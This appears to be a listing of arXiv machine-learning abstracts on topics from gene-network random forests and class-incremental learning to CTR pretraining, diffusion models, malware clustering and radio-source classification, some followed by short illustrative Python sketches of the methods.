    Gene network information is believed to be beneficial for disease module and pathway identification, but has not been explicitly utilized in the standard random forest (RF) algorithm for gene expression data analysis. We investigate the performance of a network-guided RF where the network information is summarized into a sampling probability of predictor variables which is further used in the construction of the RF. Our results suggest that network-guided RF does not provide better disease prediction than the standard RF. In terms of disease gene discovery, if disease genes form module(s), network-guided RF identifies them more accurately. In addition, when disease status is independent from genes in the given network, spurious gene selection results can occur when using network information, especially on hub genes. Our empirical analysis on two balanced microarray and RNA-Seq breast cancer datasets from The Cancer Genome Atlas (TCGA) for classification of progesterone receptor (PR) status also demonstrates that network-guided RF can identify genes from PGR-related pathways, which leads to a better connected module of identified genes.
    Neural Collapse Terminus: A Unified Solution for Class Incremental Learning and Its Variants. (arXiv:2308.01746v1 [cs.LG])
    Enabling the learning of new classes while maintaining performance on old classes has been a crucial challenge for class incremental learning (CIL). Beyond this standard setting, long-tail class incremental learning (LTCIL) and few-shot class incremental learning (FSCIL) have also been proposed to address data imbalance and data scarcity, respectively, which are common in real-world deployments and further exacerbate the well-known problem of catastrophic forgetting. Existing methods are specifically proposed for one of the three tasks. In this paper, we offer a unified solution to the misalignment dilemma in the three tasks. Concretely, we propose neural collapse terminus that is a fixed structure with the maximal equiangular inter-class separation for the whole label space. It serves as a consistent target throughout the incremental training to avoid dividing the feature space incrementally. For CIL and LTCIL, we further propose a prototype evolving scheme to drive the backbone features into our neural collapse terminus smoothly. Our method also works for FSCIL with only minor adaptations. Theoretical analysis indicates that our method holds the neural collapse optimality in an incremental fashion regardless of data imbalance or data scarcity. We also design a generalized case where we do not know the total number of classes and whether the data distribution is normal, long-tail, or few-shot for each coming session, to test the generalizability of our method. Extensive experiments with multiple datasets are conducted to demonstrate the effectiveness of our unified solution to all three tasks and the generalized case.
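    The "fixed structure with the maximal equiangular inter-class separation" is a simplex equiangular tight frame (ETF), the geometry that neural collapse converges to. A minimal sketch of constructing such a target for the whole label space (function name and seeding are ours, not the paper's):

```python
import numpy as np

def simplex_etf(num_classes: int, dim: int, seed: int = 0) -> np.ndarray:
    """Fixed classifier prototypes with maximal equiangular separation.

    Returns a (num_classes, dim) matrix whose rows are unit vectors with
    pairwise cosine similarity -1/(num_classes - 1), i.e. a simplex ETF.
    """
    assert dim >= num_classes
    rng = np.random.default_rng(seed)
    # Random orthonormal basis: columns of u are orthonormal in R^dim.
    u, _ = np.linalg.qr(rng.standard_normal((dim, num_classes)))
    k = num_classes
    # Centering matrix projects out the all-ones direction.
    centering = np.eye(k) - np.ones((k, k)) / k
    m = np.sqrt(k / (k - 1)) * (u @ centering)
    return m.T  # rows are the fixed class prototypes
```

Because the prototypes are fixed in advance for every class that may ever arrive, incremental sessions never have to re-partition the feature space; training only pulls backbone features toward their assigned prototype.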
    Multitask Learning with No Regret: from Improved Confidence Bounds to Active Learning. (arXiv:2308.01744v1 [cs.LG])
    Multitask learning is a powerful framework that enables one to simultaneously learn multiple related tasks by sharing information between them. Quantifying uncertainty in the estimated tasks is of pivotal importance for many downstream applications, such as online or active learning. In this work, we provide novel multitask confidence intervals in the challenging agnostic setting, i.e., when neither the similarity between tasks nor the tasks' features are available to the learner. The obtained intervals do not require i.i.d. data and can be directly applied to bound the regret in online learning. Through a refined analysis of the multitask information gain, we obtain new regret guarantees that, depending on a task similarity parameter, can significantly improve over treating tasks independently. We further propose a novel online learning algorithm that achieves such improved regret without knowing this parameter in advance, i.e., automatically adapting to task similarity. As a second key application of our results, we introduce a novel multitask active learning setup where several tasks must be simultaneously optimized, but only one of them can be queried for feedback by the learner at each round. For this problem, we design a no-regret algorithm that uses our confidence intervals to decide which task should be queried. Finally, we empirically validate our bounds and algorithms on synthetic and real-world (drug discovery) data.
    MAP: A Model-agnostic Pretraining Framework for Click-through Rate Prediction. (arXiv:2308.01737v1 [cs.IR])
    With the widespread application of personalized online services, click-through rate (CTR) prediction has received increasing attention. The most prominent features of CTR prediction are its multi-field categorical data format, and vast and daily-growing data volume. The large capacity of neural models helps digest such massive amounts of data under the supervised learning paradigm, yet they fail to utilize the substantial data to its full potential, since the 1-bit click signal is not sufficient to guide the model to learn capable representations of features and instances. The self-supervised learning paradigm provides a more promising pretrain-finetune solution to better exploit the large amount of user click logs, and learn more generalized and effective representations. However, self-supervised learning for CTR prediction is still an open question, since existing work in this direction is still preliminary. To this end, we propose a Model-agnostic pretraining (MAP) framework that applies feature corruption and recovery on multi-field categorical data, and more specifically, we derive two practical algorithms: masked feature prediction (MFP) and replaced feature detection (RFD). MFP digs into feature interactions within each instance through masking and predicting a small portion of input features, and introduces noise contrastive estimation (NCE) to handle large feature spaces. RFD further turns MFP into a binary classification mode through replacing and detecting changes in input features, making it even simpler and more effective for CTR pretraining. Our extensive experiments on two real-world large-scale datasets (i.e., Avazu, Criteo) demonstrate the advantages of these two methods on several strong backbones (e.g., DCNv2, DeepFM), and achieve new state-of-the-art performance in terms of both effectiveness and efficiency for CTR pretraining.
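    The RFD corruption step can be sketched as follows, assuming (our assumption, not the paper's exact recipe) that replacements are drawn uniformly from each field's vocabulary:

```python
import numpy as np

def rfd_corrupt(x, vocab_sizes, replace_prob=0.15, seed=0):
    """Replaced-feature-detection style corruption, a minimal sketch.

    x: (batch, num_fields) int array of categorical feature IDs.
    Each feature is replaced with a random ID from its field's
    vocabulary with probability `replace_prob`. Returns the corrupted
    batch and the binary labels (1 = replaced) that a detector head
    would be trained to predict. Note a random draw may coincide with
    the original ID; a fuller implementation would resample.
    """
    rng = np.random.default_rng(seed)
    mask = rng.random(x.shape) < replace_prob
    random_ids = np.stack(
        [rng.integers(0, v, size=x.shape[0]) for v in vocab_sizes], axis=1
    )
    corrupted = np.where(mask, random_ids, x)
    return corrupted, mask.astype(np.int64)
```

Turning the pretext task into per-feature binary classification is what makes RFD cheaper than MFP: no softmax over large vocabularies (and hence no NCE) is needed.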
    Masked Diffusion Models Are Fast and Privacy-Aware Learners. (arXiv:2306.11363v2 [cs.CV] UPDATED)
    Diffusion models have emerged as the \emph{de-facto} technique for image generation, yet they entail significant computational overhead, hindering the technique's broader application in the research community. We propose a prior-based denoising training framework, the first to incorporate the pre-train and fine-tune paradigm into the diffusion model training process, which substantially improves training efficiency and shows potential in facilitating various downstream tasks. Our approach centers on masking a high proportion (e.g., up to 90\%) of the input image and employing masked denoising score matching to denoise the visible areas, thereby guiding the diffusion model to learn more salient features from training data as prior knowledge. By utilizing masked learning in a pre-training stage, we efficiently train the ViT-based diffusion model on CelebA-HQ $256 \times 256$ in the pixel space, achieving a 4x acceleration and enhancing the quality of generated images compared to denoising diffusion probabilistic model (DDPM). Moreover, our masked pre-training technique can be universally applied to various diffusion models that directly generate images in the pixel space, aiding in the learning of pre-trained models with superior generalizability. For instance, a diffusion model pre-trained on VGGFace2 attains a 46\% quality improvement through fine-tuning with merely 10\% data from a different distribution. Moreover, our method shows the potential to serve as a training paradigm for enhancing the privacy protection capabilities of diffusion models. Our code is available at \url{https://github.com/jiachenlei/maskdm}.
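    The core of masked denoising score matching is that the usual noise-prediction error is averaged only over the visible pixels. A minimal sketch (function names are ours):

```python
import numpy as np

def random_visible_mask(shape, visible_frac=0.1, seed=0):
    """Keep roughly `visible_frac` of the pixels (1 = visible)."""
    rng = np.random.default_rng(seed)
    return (rng.random(shape) < visible_frac).astype(np.float64)

def masked_denoising_loss(noise, pred_noise, visible_mask):
    """DDPM-style noise-prediction loss restricted to visible pixels,
    so the model trains on e.g. only 10% of each image per step."""
    err = (pred_noise - noise) ** 2
    return float((err * visible_mask).sum() / visible_mask.sum())
```

With up to 90% of each image masked, far fewer tokens pass through the ViT backbone per step, which is where the reported 4x pre-training acceleration comes from.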
    Graph Neural Networks for Forecasting Multivariate Realized Volatility with Spillover Effects. (arXiv:2308.01419v1 [q-fin.ST])
    We present a novel methodology for modeling and forecasting multivariate realized volatilities using customized graph neural networks to incorporate spillover effects across stocks. The proposed model offers the benefits of incorporating spillover effects from multi-hop neighbors, capturing nonlinear relationships, and flexible training with different loss functions. Our empirical findings provide compelling evidence that incorporating spillover effects from multi-hop neighbors alone does not yield a clear advantage in terms of predictive accuracy. However, modeling nonlinear spillover effects enhances the forecasting accuracy of realized volatilities, particularly for short-term horizons of up to one week. Moreover, our results consistently indicate that training with the Quasi-likelihood loss leads to substantial improvements in model performance compared to the commonly-used mean squared error. A comprehensive series of empirical evaluations in alternative settings confirm the robustness of our results.
    A Neural Network Warm-Start Approach for the Inverse Acoustic Obstacle Scattering Problem. (arXiv:2212.08736v3 [math.NA] UPDATED)
    We consider the inverse acoustic obstacle problem for sound-soft star-shaped obstacles in two dimensions wherein the boundary of the obstacle is determined from measurements of the scattered field at a collection of receivers outside the object. One of the standard approaches for solving this problem is to reformulate it as an optimization problem: finding the boundary of the domain that minimizes the $L^2$ distance between computed values of the scattered field and the given measurement data. The optimization problem is computationally challenging since the local set of convexity shrinks with increasing frequency and results in an increasing number of local minima in the vicinity of the true solution. In many practical experimental settings, low frequency measurements are unavailable due to limitations of the experimental setup or the sensors used for measurement. Thus, obtaining a good initial guess for the optimization problem plays a vital role in this environment. We present a neural network warm-start approach for solving the inverse scattering problem, where an initial guess for the optimization problem is obtained using a trained neural network. We demonstrate the effectiveness of our method with several numerical examples. For high frequency problems, this approach outperforms traditional iterative methods such as Gauss-Newton initialized without any prior (i.e., initialized using a unit circle), or initialized using the solution of a direct method such as the linear sampling method. The algorithm remains robust to noise in the scattered field measurements and also converges to the true solution for limited aperture data. However, the number of training samples required to train the neural network scales exponentially in frequency and the complexity of the obstacles considered. We conclude with a discussion of this phenomenon and potential directions for future research.
    Telematics Combined Actuarial Neural Networks for Cross-Sectional and Longitudinal Claim Count Data. (arXiv:2308.01729v1 [stat.ML])
    We present novel cross-sectional and longitudinal claim count models for vehicle insurance built upon the Combined Actuarial Neural Network (CANN) framework proposed by Mario W\"uthrich and Michael Merz. The CANN approach combines a classical actuarial model, such as a generalized linear model, with a neural network. This blending of models results in a two-component model comprising a classical regression model and a neural network part. The CANN model leverages the strengths of both components, providing a solid foundation and interpretability from the classical model while harnessing the flexibility and capacity to capture intricate relationships and interactions offered by the neural network. In our proposed models, we use well-known log-linear claim count regression models for the classical regression part and a multilayer perceptron (MLP) for the neural network part. The MLP part is used to process telematics car driving data given as a vector characterizing the driving behavior of each insured driver. In addition to the Poisson and negative binomial distributions for cross-sectional data, we propose a procedure for training our CANN model with a multivariate negative binomial (MVNB) specification. By doing so, we introduce a longitudinal model that accounts for the dependence between contracts from the same insured. Our results reveal that the CANN models exhibit superior performance compared to log-linear models that rely on manually engineered telematics features.
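    The two-component structure of a CANN claim-count model can be sketched in a few lines: the classical log-linear score and the neural score are added before the exponential link. This is a skeleton under our own simplifications; `mlp_forward` stands in for any network mapping telematics vectors to a scalar score per driver.

```python
import numpy as np

def cann_poisson_mean(x_classical, beta, telematics, mlp_forward):
    """Combined Actuarial Neural Network (CANN) skeleton.

    Expected claim count = exp(GLM score + neural score): the
    log-linear actuarial model supplies an interpretable baseline,
    while the MLP on telematics data learns a multiplicative
    correction factor exp(eta_nn) per contract.
    """
    eta_glm = x_classical @ beta          # classical log-linear part
    eta_nn = mlp_forward(telematics)      # neural network part
    return np.exp(eta_glm + eta_nn)       # Poisson mean per contract
```

Initializing the neural part at zero output recovers the classical model exactly, which is why CANN training can be seen as boosting a fitted actuarial model.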
    Classification and Online Clustering of Zero-Day Malware. (arXiv:2305.00605v2 [cs.CR] UPDATED)
    A large amount of new malware is constantly being generated, which must not only be distinguished from benign samples, but also classified into malware families. This requires investigating how existing malware families develop and examining emerging families as they appear. This paper focuses on the online processing of incoming malicious samples to assign them to existing families or, in the case of samples from new families, to cluster them. We experimented with seven prevalent malware families from the EMBER dataset, four in the training set and three additional new families in the test set. Based on the classification score of the multilayer perceptron, we determined which samples would be classified and which would be clustered into new malware families. We classified 97.21% of streaming data with a balanced accuracy of 95.33%. Then, we clustered the remaining data using a self-organizing map, achieving a purity from 47.61% for four clusters to 77.68% for ten clusters. These results indicate that our approach has the potential to be applied to the classification and clustering of zero-day malware into malware families.
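    The routing step, deciding per sample between classification and clustering based on the classifier's score, can be sketched as a simple confidence threshold (the threshold value below is a hypothetical placeholder, not the paper's tuned value):

```python
import numpy as np

def route_samples(probs, tau=0.9):
    """Score-based routing sketch: samples the classifier is confident
    about (max class probability >= tau) are assigned to a known
    family; the rest are deferred to online clustering as potential
    new families.

    probs: (n_samples, n_families) class probabilities.
    Returns (assigned family per confident sample, indices deferred).
    """
    conf = probs.max(axis=1)
    assigned = probs.argmax(axis=1)
    to_classify = conf >= tau
    return assigned[to_classify], np.where(~to_classify)[0]
```

In the paper's pipeline the deferred samples feed a self-organizing map, whose cluster purity is then measured against the held-out new families.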
    Finding the Optimum Design of Large Gas Engines Prechambers Using CFD and Bayesian Optimization. (arXiv:2308.01743v1 [cs.CE])
    The turbulent jet ignition concept using prechambers is a promising solution to achieve stable combustion at lean conditions in large gas engines, leading to high efficiency at low emission levels. Due to the wide range of design and operating parameters for large gas engine prechambers, the preferred method for evaluating different designs is computational fluid dynamics (CFD), as testing in test bed measurement campaigns is time-consuming and expensive. However, the significant computational time required for detailed CFD simulations due to the complexity of solving the underlying physics also limits its applicability. In optimization settings similar to the present case, i.e., where the evaluation of the objective function(s) is computationally costly, Bayesian optimization has largely replaced classical design-of-experiments methods. Thus, the present study deals with the computationally efficient Bayesian optimization of large gas engine prechamber designs using CFD simulations. Reynolds-averaged Navier-Stokes simulations are used to determine the target values as a function of the selected prechamber design parameters. The results indicate that the chosen strategy is effective in finding a prechamber design that achieves the desired target values.
    Implicit Occupancy Flow Fields for Perception and Prediction in Self-Driving. (arXiv:2308.01471v1 [cs.CV])
    A self-driving vehicle (SDV) must be able to perceive its surroundings and predict the future behavior of other traffic participants. Existing works either perform object detection followed by trajectory forecasting of the detected objects, or predict dense occupancy and flow grids for the whole scene. The former poses a safety concern as the number of detections needs to be kept low for efficiency reasons, sacrificing object recall. The latter is computationally expensive due to the high-dimensionality of the output grid, and suffers from the limited receptive field inherent to fully convolutional networks. Furthermore, both approaches employ many computational resources predicting areas or objects that might never be queried by the motion planner. This motivates our unified approach to perception and future prediction that implicitly represents occupancy and flow over time with a single neural network. Our method avoids unnecessary computation, as it can be directly queried by the motion planner at continuous spatio-temporal locations. Moreover, we design an architecture that overcomes the limited receptive field of previous explicit occupancy prediction methods by adding an efficient yet effective global attention mechanism. Through extensive experiments in both urban and highway settings, we demonstrate that our implicit model outperforms the current state-of-the-art. For more information, visit the project website: https://waabi.ai/research/implicito.
    Confident Neural Network Regression with Bootstrapped Deep Ensembles. (arXiv:2202.10903v2 [stat.ML] UPDATED)
    With the rise of the popularity and usage of neural networks, trustworthy uncertainty estimation is becoming increasingly essential. One of the most prominent uncertainty estimation methods is Deep Ensembles (Lakshminarayanan et al., 2017). A classical parametric model has uncertainty in the parameters due to the fact that the data on which the model is built is a random sample. A modern neural network has an additional uncertainty component since the optimization of the network is random. Lakshminarayanan et al. (2017) noted that Deep Ensembles do not incorporate the classical uncertainty induced by the effect of finite data. In this paper, we present a computationally cheap extension of Deep Ensembles for the regression setting, called Bootstrapped Deep Ensembles, that explicitly takes this classical effect of finite data into account using a modified version of the parametric bootstrap. We demonstrate through an experimental study that our method significantly improves upon standard Deep Ensembles.
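    The parametric-bootstrap idea can be illustrated with a toy stand-in: here ordinary least squares replaces the neural network as the base learner (our simplification, not the paper's setup). Each ensemble member is refit on simulated responses drawn from the fitted model, so the member spread reflects finite-data uncertainty.

```python
import numpy as np

def bootstrapped_ensemble_predict(x, y, x_new, n_members=10, seed=0):
    """Parametric-bootstrap ensemble for 1-D regression, a sketch.

    Fit a base model, estimate the noise level from residuals, then
    refit each member on y* = f_hat(x) + eps*, eps* ~ N(0, sigma^2).
    Returns the mean and standard deviation of member predictions.
    """
    rng = np.random.default_rng(seed)
    X = np.column_stack([np.ones_like(x), x])
    Xn = np.column_stack([np.ones_like(x_new), x_new])
    beta = np.linalg.lstsq(X, y, rcond=None)[0]
    sigma = (y - X @ beta).std(ddof=2)  # residual noise estimate
    preds = []
    for _ in range(n_members):
        y_star = X @ beta + rng.normal(0.0, sigma, size=len(y))
        beta_star = np.linalg.lstsq(X, y_star, rcond=None)[0]
        preds.append(Xn @ beta_star)
    preds = np.asarray(preds)
    return preds.mean(axis=0), preds.std(axis=0)
```

With a neural network, each refit would additionally use a fresh random initialization, so the ensemble spread captures both the optimization randomness of Deep Ensembles and the classical finite-data effect.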
    Explainable Deep Learning for Tumor Dynamic Modeling and Overall Survival Prediction using Neural-ODE. (arXiv:2308.01362v1 [q-bio.QM])
    While tumor dynamic modeling has been widely applied to support the development of oncology drugs, there remains a need to increase predictivity, enable personalized therapy, and improve decision-making. We propose the use of Tumor Dynamic Neural-ODE (TDNODE) as a pharmacology-informed neural network to enable model discovery from longitudinal tumor size data. We show that TDNODE overcomes a key limitation of existing models in its ability to make unbiased predictions from truncated data. The encoder-decoder architecture is designed to express an underlying dynamical law which possesses the fundamental property of generalized homogeneity with respect to time. Thus, the modeling formalism enables the encoder output to be interpreted as kinetic rate metrics, with inverse time as the physical unit. We show that the generated metrics can be used to predict patients' overall survival (OS) with high accuracy. The proposed modeling formalism provides a principled way to integrate multimodal dynamical datasets in oncology disease modeling.
    Auxiliary Cross-Modal Representation Learning with Triplet Loss Functions for Online Handwriting Recognition. (arXiv:2202.07901v3 [cs.LG] UPDATED)
    Cross-modal representation learning learns a shared embedding between two or more modalities to improve performance in a given task compared to using only one of the modalities. Cross-modal representation learning from different data types -- such as images and time-series data (e.g., audio or text data) -- requires a deep metric learning loss that minimizes the distance between the modality embeddings. In this paper, we propose to use the contrastive or triplet loss, which uses positive and negative identities to create sample pairs with different labels, for cross-modal representation learning between image and time-series modalities (CMR-IS). By adapting the triplet loss for cross-modal representation learning, higher accuracy in the main (time-series classification) task can be achieved by exploiting additional information of the auxiliary (image classification) task. We present a triplet loss with a dynamic margin for single label and sequence-to-sequence classification tasks. We perform extensive evaluations on synthetic image and time-series data, on data for offline handwriting recognition (HWR), and on online HWR from sensor-enhanced pens for classifying written words. Our experiments show an improved classification accuracy, faster convergence, and better generalizability due to an improved cross-modal representation. Furthermore, the improved generalizability leads to better adaptability across writers for online HWR.
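    The triplet loss with a per-sample margin can be written compactly; in the cross-modal setting, anchors come from one modality's encoder and positives/negatives from the other's. How the dynamic margin is computed per sample is the paper's contribution; here it is simply taken as an input.

```python
import numpy as np

def triplet_loss(anchor, positive, negative, margin):
    """Triplet loss with a (possibly per-sample) margin, sketched.

    anchor/positive/negative: (batch, dim) embeddings; margin: scalar
    or (batch,) array. Pulls the anchor toward the positive and away
    from the negative until the distance gap exceeds the margin.
    """
    d_pos = np.linalg.norm(anchor - positive, axis=1)
    d_neg = np.linalg.norm(anchor - negative, axis=1)
    return float(np.maximum(d_pos - d_neg + margin, 0.0).mean())
```

A dynamic margin lets "harder" triplets (e.g., visually similar words) demand a larger separation than easy ones, rather than applying one fixed margin to all pairs.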
    Variational Classification. (arXiv:2305.10406v2 [cs.LG] UPDATED)
    We present a latent variable generalisation of neural network softmax classification trained with cross-entropy loss, referred to as variational classification (VC). Our approach offers a novel probabilistic perspective on the highly familiar softmax classification model, to which it relates similarly to how variational and traditional autoencoders relate. We derive a training objective based on the evidence lower bound (ELBO) that is non-trivial to optimize, and therefore propose an adversarial approach to maximise it. We show that VC addresses an inherent inconsistency within softmax classification, whilst also allowing more flexible choices of prior distributions in the latent space in place of implicit assumptions revealed within off-the-shelf softmax classifiers. Empirical evaluation on image and text classification datasets demonstrates that variational classification maintains prediction accuracy while improving other desirable properties such as calibration and adversarial robustness, particularly under distribution shift and low data settings.
    MARLIM: Multi-Agent Reinforcement Learning for Inventory Management. (arXiv:2308.01649v1 [cs.LG])
    Maintaining a balance between the supply and demand of products by optimizing replenishment decisions is one of the most important challenges in the supply chain industry. This paper presents a novel reinforcement learning framework called MARLIM to address the inventory management problem for a single-echelon multi-product supply chain with stochastic demands and lead times. Within this context, controllers are developed through single or multiple agents in a cooperative setting. Numerical experiments on real data demonstrate the benefits of reinforcement learning methods over traditional baselines.
    Benchmarking Adaptative Variational Quantum Algorithms on QUBO Instances. (arXiv:2308.01789v1 [quant-ph])
    In recent years, Variational Quantum Algorithms (VQAs) have emerged as a promising approach for solving optimization problems on quantum computers in the NISQ era. However, one limitation of VQAs is their reliance on fixed-structure circuits, which may not be tailored for specific problems or hardware configurations. A leading strategy to address this issue is Adaptative VQAs, which dynamically modify the circuit structure by adding and removing gates, and optimize their parameters during the training. Several Adaptative VQAs, based on heuristics such as circuit shallowness, entanglement capability and hardware compatibility, have already been proposed in the literature, but there is still a lack of a systematic comparison between the different methods. In this paper, we aim to fill this gap by analyzing three Adaptative VQAs: Evolutionary Variational Quantum Eigensolver (EVQE), Variable Ansatz (VAns), already proposed in the literature, and Random Adapt-VQE (RA-VQE), a random approach we introduce as a baseline. In order to compare these algorithms to traditional VQAs, we also include the Quantum Approximate Optimization Algorithm (QAOA) in our analysis. We apply these algorithms to QUBO problems and study their performance by examining the quality of the solutions found and the computational times required. Additionally, we investigate how the choice of the hyperparameters can impact the overall performance of the algorithms, highlighting the importance of selecting an appropriate methodology for hyperparameter tuning. Our analysis sets benchmarks for Adaptative VQAs designed for near-term quantum devices and provides valuable insights to guide future research in this area.
    Model Calibration in Dense Classification with Adaptive Label Perturbation. (arXiv:2307.13539v2 [cs.CV] UPDATED)
    For safety-related applications, it is crucial to produce trustworthy deep neural networks whose prediction is associated with confidence that can represent the likelihood of correctness for subsequent decision-making. Existing dense binary classification models are prone to being over-confident. To improve model calibration, we propose Adaptive Stochastic Label Perturbation (ASLP) which learns a unique label perturbation level for each training image. ASLP employs our proposed Self-Calibrating Binary Cross Entropy (SC-BCE) loss, which unifies label perturbation processes including stochastic approaches (like DisturbLabel), and label smoothing, to correct calibration while maintaining classification rates. ASLP follows Maximum Entropy Inference of classic statistical mechanics to maximise prediction entropy with respect to missing information. It does so while either (1) preserving classification accuracy on known data as a conservative solution, or (2) specifically improving the model's calibration by minimising the gap between the prediction accuracy and expected confidence of the target training label. Extensive results demonstrate that ASLP can significantly improve the calibration of dense binary classification models on both in-distribution and out-of-distribution data. The code is available on https://github.com/Carlisle-Liu/ASLP.
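    The label-smoothing special case of the idea behind SC-BCE can be sketched in a few lines: each label is smoothed toward 0.5 by its own perturbation level alpha, which raises the entropy of the training target and counteracts over-confidence. This is a simplified illustration, not the full SC-BCE (which also unifies stochastic perturbation a la DisturbLabel, and in ASLP learns alpha per image).

```python
import numpy as np

def smoothed_bce(pred, target, alpha):
    """Binary cross-entropy against a label smoothed toward 0.5.

    pred, target: arrays of predicted probabilities and hard labels;
    alpha: perturbation level in [0, 1] (scalar or per-sample).
    alpha = 0 recovers plain BCE; alpha = 1 targets maximum entropy.
    """
    soft = (1.0 - alpha) * target + alpha * 0.5
    eps = 1e-12  # numerical guard for log(0)
    return float(-(soft * np.log(pred + eps)
                   + (1.0 - soft) * np.log(1.0 - pred + eps)).mean())
```

A per-pixel alpha is what makes the perturbation "adaptive": confidently correct regions can keep hard labels while ambiguous ones are pushed toward higher-entropy targets.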
    Unsupervised Compositional Concepts Discovery with Text-to-Image Generative Models. (arXiv:2306.05357v2 [cs.CV] UPDATED)
    Text-to-image generative models have enabled high-resolution image synthesis across different domains, but require users to specify the content they wish to generate. In this paper, we consider the inverse problem -- given a collection of different images, can we discover the generative concepts that represent each image? We present an unsupervised approach to discover generative concepts from a collection of images, disentangling different art styles in paintings, objects, and lighting from kitchen scenes, and discovering image classes given ImageNet images. We show how such generative concepts can accurately represent the content of images, be recombined and composed to generate new artistic and hybrid images, and be further used as a representation for downstream classification tasks.
    On the Trustworthiness Landscape of State-of-the-art Generative Models: A Comprehensive Survey. (arXiv:2307.16680v2 [cs.LG] UPDATED)
    Diffusion models and large language models have emerged as leading-edge generative models and have sparked a revolutionary impact on various aspects of human life. However, the practical implementation of these models has also exposed inherent risks, highlighting their dual nature and raising concerns regarding their trustworthiness. Despite the abundance of literature on this subject, a comprehensive survey specifically delving into the intersection of large-scale generative models and their trustworthiness remains largely absent. To bridge this gap, this paper investigates both the long-standing and emerging threats associated with these models across four fundamental dimensions: privacy, security, fairness, and responsibility. In this way, we construct an extensive map outlining the trustworthiness of these models, while also providing practical recommendations and identifying future directions. These efforts are crucial for promoting the trustworthy deployment of these models, ultimately benefiting society as a whole.
    Distributed Online Private Learning of Convex Nondecomposable Objectives. (arXiv:2206.07944v4 [math.OC] UPDATED)
    We deal with a general distributed constrained online learning problem with privacy over time-varying networks, where a class of nondecomposable objectives are considered. Under this setting, each node only controls a part of the global decision, and the goal of all nodes is to collaboratively minimize the global cost over a time horizon $T$ while guaranteeing the security of the transmitted information. For such problems, we first design a novel generic algorithm framework, named DPSDA, of differentially private distributed online learning using the Laplace mechanism and the stochastic variants of dual averaging method. Note that in the dual updates, all nodes of DPSDA employ the noise-corrupted gradients for more generality. Then, we propose two algorithms, named DPSDA-C and DPSDA-PS, under this framework. In DPSDA-C, the nodes implement a circulation-based communication in the primal updates so as to alleviate the disagreements over time-varying undirected networks. In addition, for the extension to time-varying directed ones, the nodes implement the broadcast-based push-sum dynamics in DPSDA-PS, which can achieve average consensus over arbitrary directed networks. Theoretical results show that both algorithms attain an expected regret upper bound of $\mathcal{O}( \sqrt{T} )$ when the objective function is convex, which matches the best utility achievable by cutting-edge algorithms. Finally, numerical experiment results on both synthetic and real-world datasets verify the effectiveness of our algorithms.
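    The Laplace-mechanism step in the dual updates can be sketched as follows; the scale sensitivity/epsilon is the standard choice for epsilon-differential privacy under a given sensitivity bound (function name and interface are ours):

```python
import numpy as np

def private_gradient(grad, epsilon, sensitivity, rng):
    """Laplace-mechanism gradient perturbation, sketched.

    Each node adds i.i.d. Laplace noise with scale sensitivity/epsilon
    to its stochastic gradient before using or sharing it, so a single
    query satisfies epsilon-differential privacy under the stated
    L1-sensitivity bound on the gradient.
    """
    scale = sensitivity / epsilon
    return grad + rng.laplace(0.0, scale, size=grad.shape)
```

Smaller epsilon (stronger privacy) means larger noise, which is the source of the privacy/regret trade-off behind the $\mathcal{O}(\sqrt{T})$ bound.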
    Reconstructing Turbulent Flows Using Physics-Aware Spatio-Temporal Dynamics and Test-Time Refinement. (arXiv:2304.12130v2 [physics.flu-dyn] UPDATED)
    Simulating turbulence is critical for many societally important applications in aerospace engineering, environmental science, the energy industry, and biomedicine. Large eddy simulation (LES) has been widely used as an alternative to direct numerical simulation (DNS) for simulating turbulent flows due to its reduced computational cost. However, LES is unable to capture all of the scales of turbulent transport accurately. Reconstructing DNS from low-resolution LES is critical for many scientific and engineering disciplines, but it poses many challenges to existing super-resolution methods due to the spatio-temporal complexity of turbulent flows. In this work, we propose a new physics-guided neural network for reconstructing the sequential DNS from low-resolution LES data. The proposed method leverages the partial differential equation that underlies the flow dynamics in the design of spatio-temporal model architecture. A degradation-based refinement method is also developed to enforce physical constraints and further reduce the accumulated reconstruction errors over long periods. The results on two different types of turbulent flow data confirm the superiority of the proposed method in reconstructing the high-resolution DNS data and preserving the physical characteristics of flow transport.
    Morphological Classification of Extragalactic Radio Sources Using Gradient Boosting Methods. (arXiv:2304.12729v2 [astro-ph.IM] UPDATED)
    The field of radio astronomy is witnessing a boom in the amount of data produced per day due to newly commissioned radio telescopes. One of the most crucial problems in this field is the automatic classification of extragalactic radio sources based on their morphologies. Most recent contributions in the field of morphological classification of extragalactic radio sources have proposed classifiers based on convolutional neural networks. Alternatively, this work proposes gradient boosting machine learning methods, accompanied by principal component analysis, as data-efficient alternatives to convolutional neural networks. Recent findings have shown the efficacy of gradient boosting methods in outperforming deep learning methods for classification problems with tabular data. The gradient boosting methods considered in this work are based on the XGBoost, LightGBM, and CatBoost implementations. This work also studies the effect of dataset size on classifier performance. A three-class classification problem is considered based on the three main Fanaroff-Riley classes: class 0, class I, and class II, using radio sources from the Best-Heckman sample. All three proposed gradient boosting methods outperformed a state-of-the-art convolutional neural network-based classifier using less than a quarter of the number of images, with CatBoost having the highest accuracy. This was mainly due to the superior accuracy of gradient boosting methods in classifying Fanaroff-Riley class II sources, with 3–4% higher recall.
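The PCA-then-gradient-boosting recipe above is straightforward to assemble as a pipeline. The sketch below uses scikit-learn's `GradientBoostingClassifier` as a generic stand-in for the XGBoost/LightGBM/CatBoost implementations the paper actually benchmarks, and synthetic data in place of flattened radio-source images; all sizes and parameters are illustrative assumptions.

```python
import numpy as np
from sklearn.datasets import make_classification
from sklearn.decomposition import PCA
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline

# Synthetic stand-in for flattened source images (3 morphology classes).
X, y = make_classification(n_samples=600, n_features=64, n_informative=12,
                           n_classes=3, random_state=0)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0)

# PCA compresses the pixel features before the boosted trees see them.
model = make_pipeline(PCA(n_components=10),
                      GradientBoostingClassifier(random_state=0))
model.fit(X_tr, y_tr)
accuracy = model.score(X_te, y_te)
```

Swapping in `xgboost.XGBClassifier`, `lightgbm.LGBMClassifier`, or `catboost.CatBoostClassifier` at the last pipeline stage recovers the three variants the paper compares.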
    Recent advancement in Disease Diagnostic using machine learning: Systematic survey of decades, comparisons, and challenges. (arXiv:2308.01319v1 [cs.LG])
